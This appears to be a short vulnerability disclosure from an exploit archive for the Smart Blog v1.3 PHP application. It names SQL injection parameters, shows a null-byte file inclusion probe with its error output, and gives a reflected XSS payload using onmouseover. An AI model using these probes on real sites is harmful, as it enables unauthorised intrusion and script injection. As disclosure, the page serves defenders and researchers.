Smart Blog v 1.3 Multi Vulnerability

2018.02.16
dz indoushka (DZ) dz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: Actionnée par smartblog

================================================================= | # Title : Smart Blog v 1.3 Multi Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : Actionnée par smartblog | # Tested on: windows 8.1 Français V.(Pro) | # Bug : Mullti | # Download : http://www.p30vel.ir ================================================================ SQl inj : http://127.0.0.1/tst/index.php?jour=22&mois=10&an=2014 (inject her) http://127.0.0.1/tst/index.php?idt=1 (inject her) File inclusion : URL encoded GET input page was set to 1some_inexistent_file_with_long_name%00.html Error message found: <b>Warning</b>: fopen(template/default/html/tpl_1some_inexistent_file_with_long_name%00.html) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: No such file or directory in <b>C:\AppServ\www\tst\lib\template.php</b> on line <b>4</b> /tst/?page=1some_inexistent_file_with_long_name%2500.html Xss : /tst/?an=2014%22%20onmouseover%3dprompt(900632)%20bad%3d%22&mois=11 Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * 9aylas * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top